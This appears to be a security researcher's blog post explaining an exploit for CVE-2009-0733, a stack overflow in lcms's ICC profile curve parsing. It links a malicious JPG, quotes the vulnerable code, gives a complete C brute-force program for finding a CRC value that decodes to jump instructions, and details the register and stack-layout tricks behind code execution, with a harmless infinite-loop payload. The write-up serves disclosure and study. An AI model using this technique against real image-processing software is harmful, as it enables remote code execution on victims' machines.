Here's the sample JPG file with embedded evil ICC profile: http://cevans-app.appspot.com/static/CVE-2009-0733.jpg
I'm only bothering to write about this because the story behind the exploit contains a few interesting twists which illustrate the iterative constraint solving used in modern exploits:
- The underlying code flaw is a stack-based buffer overflow. But the data going past the bounds is not arbitrarily user-controlled. (If it were, a traditional stack smashing exploit would work, but the ASLR could affect the reliability of the exploit). Here's the faulty code in cmsio1.c, where
nCurvescan end up greater thanMAXCHANNELS:
static
LCMSBOOL ReadSetOfCurves(LPLCMSICCPROFILE Icc, size_t Offset, LPLUT NewLUT, int nLocation)
{
LPGAMMATABLE Curves[MAXCHANNELS];
...
for (i=0; i < nCurves; i++) {
Curves[i] = ReadCurve(Icc);
... - The data going past bounds is actually pointers to heap chunks (returned by
ReadCurve). This is nice because it takes ASLR out of the equation. We'll automatically overwrite%eipwith a pointer to a valid heap address. But what is in that heap chunk? If it were arbitrary user controlled data, we'd have game over already, but unfortunately it is not. We're looking at pointers to this structure:
struct GAMMATABLE {
unsigned int Crc32;
int Type;
double Params[10];
int nEntries;
WORD GammaTable[1];
} - There are two types of constructs in the input ICC profile used as a basis to populate this structure:
curvandpara.curvis of little use to us because it mostly leavesCrc32set to0(or set based only on 16 bits of input entropy). Trying to execute the code0x00 0x00is a crash because it dereferences the%eaxregister:add %al,(%eax), and the value of this register is left as0or1to denote success of failure when theReadSetOfCurvesfunction exits. - This leaves us looking at a
paracurve, which calculatesCrc32based very indirectly on some input variables under our control. Although we can't reverse it, we can brute force it with a little program:
#include "lcms.h"
static
void AdjustEndianess32(LPBYTE pByte)
{
BYTE temp1;
BYTE temp2;
temp1 = *pByte++;
temp2 = *pByte++;
*(pByte-1) = *pByte;
*pByte++ = temp2;
*(pByte-3) = *pByte;
*pByte = temp1;
}
static
double Convert15Fixed16(icS15Fixed16Number fix32)
{
double floater, sign, mid, hack;
int Whole, FracPart;
AdjustEndianess32((LPBYTE) &fix32);
sign = (fix32 < 0 ? -1 : 1);
fix32 = abs(fix32);
Whole = LOWORD(fix32 >> 16);
FracPart = LOWORD(fix32 & 0x0000ffffL);
hack = 65536.0;
mid = (double) FracPart / hack;
floater = (double) Whole + mid;
return sign * floater;
}
int
main(int argc, const char* argv[]) {
unsigned int crc;
unsigned char* p_crc;
double params[10];
int type = 0;
unsigned int i;
unsigned int start = atoi(argv[1]);
for (i = start; i <= 0xffffffff; ++i) {
if ((i % 10000) == 0) {
printf("progress: %u\n", i);
}
params[0] = Convert15Fixed16(i);
LPGAMMATABLE table = cmsBuildParametricGamma(4096, type + 1, params);
crc = table->Seed.Crc32;
p_crc = &crc;
if ((p_crc[0] == 0x93 || p_crc[0] == 0x95 || p_crc[0] == 0x97) &&
p_crc[1] == 0xff &&
p_crc[2] == 0xe6) {
printf("got it!!!!!!! %u %u\n", i, p_crc[0]);
return 0;
}
free(table);
}
return 1;
} - What does this program do? Let's see:
chris@chris-desktop:~/progs$ ./a.out 3221970952
got it!!!!!!! 3221970952 151
This is telling us that aparacurve of type0whose 4 input bytes are3221970952 == 0xC00B6008will result in0x97 0xff 0xe6 0x??being written toCrc32. We don't care about the last byte. This assembles toxchg %eax,%edi jmp %esiwhich will execute because%eipjumps to thisparaheap chunk, which starts with the CRC. It is urgent to do something in 4 bytes or less because we have terrible control over the rest of the content of this heap chunk. What these 3 bytes do is to overwrite%eaxwith%edithen jump to%esi. The significance here is that both registers we used were under our control because they were also restored from the stack we trashed with pointers to valid heap chunks. - So execution continues at the curve heap chunk pointed to by
%esi. We arrange for this to be acurvtype chunk. Earlier we dismissed them as useless because the0 Crc32will result in a dereference of%eax. But now, thanks to ourparachunk, we've repaired%eaxto point to a valid heap chunk! Unlikeparachunks,curvchunks do contain arbitrary data we can supply, after a mostly-zero header. We've essentially used the control at the beginning of aparachunk to repair%eaxand use the vast control at the end of acurvchunk. Before our arbitrary code executes, a bunch of now harmless0x00 0x00will execute, writing some junk at the start of one of our unused heap chunks. Finally, just before our arbitrary code, the value ofnEntriesin the header will be executed. This value is0x02 0x00 0x00 0x00which isadd (%eax),%al add %al,(%eax). This trashes%eaxa little bit before dereferencing it again, but only up to 256 bytes, so we're good and we could always use a different number of entries in ourcurvchunk. Certainly, a real payload would need more than 2 words. - The actual arbitrary code that executes is
0xeb 0xfewhich is equivalent tofor (;;);in C. Look out for an endian reversed instance of those two bytes, as well as an endian reversed0xC00B6008in the exploit file. - There's one further twist in the exploit relating to stack alignment. Some compilation optimization leaves no space between the end of the
Curvesarray and the start of the saved registers. Other cases have a 4-byte gap. The exploit caters for both these stack layouts by careful layout ofcurvvs.parachunks. Here's a simple illustrative table:
As can be seen,Curve in input file Hit if 0 gap Hit if 4 bytes gap 17: blank curv ebp 4-byte gap 18: curv payload esi ebp 19: curv payload edi esi 20: blank curv ebx edi 21: para redirect payload eip ebx 22: para redirect payload eip + 4 eip %eipalways gets theparapayload and%esialways gets the real payload.
1 comment:
Muy Bueno!
Post a Comment